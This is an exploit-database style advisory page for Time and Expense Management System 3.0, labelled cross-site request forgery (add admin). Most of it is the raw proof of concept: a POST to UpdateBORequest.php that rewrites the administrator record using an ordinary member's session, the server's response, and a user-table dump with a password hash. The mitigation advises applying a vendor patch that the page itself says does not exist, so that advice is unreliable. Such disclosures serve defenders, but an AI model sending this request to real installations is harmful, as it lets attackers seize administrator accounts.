Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin)

vendor:

Time and Expense Management System

by:

Ihsan Sencan

7.5

CVSS

HIGH

Cross-Site Request Forgery

CWE

Product Name: Time and Expense Management System

Affected Version From: 3

Affected Version To: 3

Patch Exists: NO

Related CWE:

CPE: a:initechs:time_and_expense_management_system:3.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 (x64), Kali Linux (x64)

2018

Time and Expense Management System 3.0 – Cross-Site Request Forgery (Add Admin)

This exploit allows an attacker to add, edit, and delete admin and all users in the Time and Expense Management System 3.0. By sending a specially crafted HTTP request to the target server, the attacker can update the admin user's information and gain administrative privileges. This vulnerability does not have a CVE assigned to it.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patch provided by the vendor. Additionally, implementing CSRF protection mechanisms, such as using anti-CSRF tokens, can help prevent such attacks.

Source

Exploit-DB raw data:

# Exploit Title: Time and Expense Management System 3.0 - Cross-Site Request Forgery (Add Admin)
# Dork: N/A
# Date: 2018-10-17
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.initechs.com/
# Software Link: http://sourceforge.net/projects/tems/files/latest
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# Description
# Normal member has all rights.

# POC: 
# 1)
# #Add,edit,delete admin+all users...
# http://localhost/[PATH]/index.php?action=ListUser
# http://localhost/[PATH]/index.php?action=BrowseUser&uid=1
# Etc..

#Update admin..
POST /[PATH]/core/controller/UpdateBORequest.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=3i34gub8ub4dk3jhjthinlv922
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 227
action=EditUser&uid=1&fullname=Administrator_Edit&email=admin@admin.com&title=Administrator_Edit&joindate=10%2F17%2F2018&reportto=admin&usergroup=&language=ENG&dateformat=MDY&status=10&debuglevel=3&dbtracelevel=0&preview_receipt=1
HTTP/1.1 200 OK
Date: Wed, 17 Oct 2018 00:46:35 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 10
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

# /* `exploitdb`.`users` */
# $users = array(
#   array('uid' => '1','users_id' => 'admin','fullname' => 'Administrator_Edit','password' => '5ebf8364d17c8df7e4afd586c24f84a0','email' => 'admin@admin.com','joindate' => '2018-10-17','reportto' => 'admin','title' => 'Administrator_Edit','status' => '10','authorizations_id' => '1','usergroup' => '','dateformat' => 'MDY','language' => 'ENG','u_menu_id' => '1','lastloginat' => '2018-10-17 00:46:50','access_count' => '4','debuglevel' => '3','dbtracelevel' => '0','preview_receipt' => '1','createat' => '2018-10-17 00:26:09','createby' => '*SYSTEM','changeat' => '2018-10-17 00:47:42','changeby' => 'efe')
# );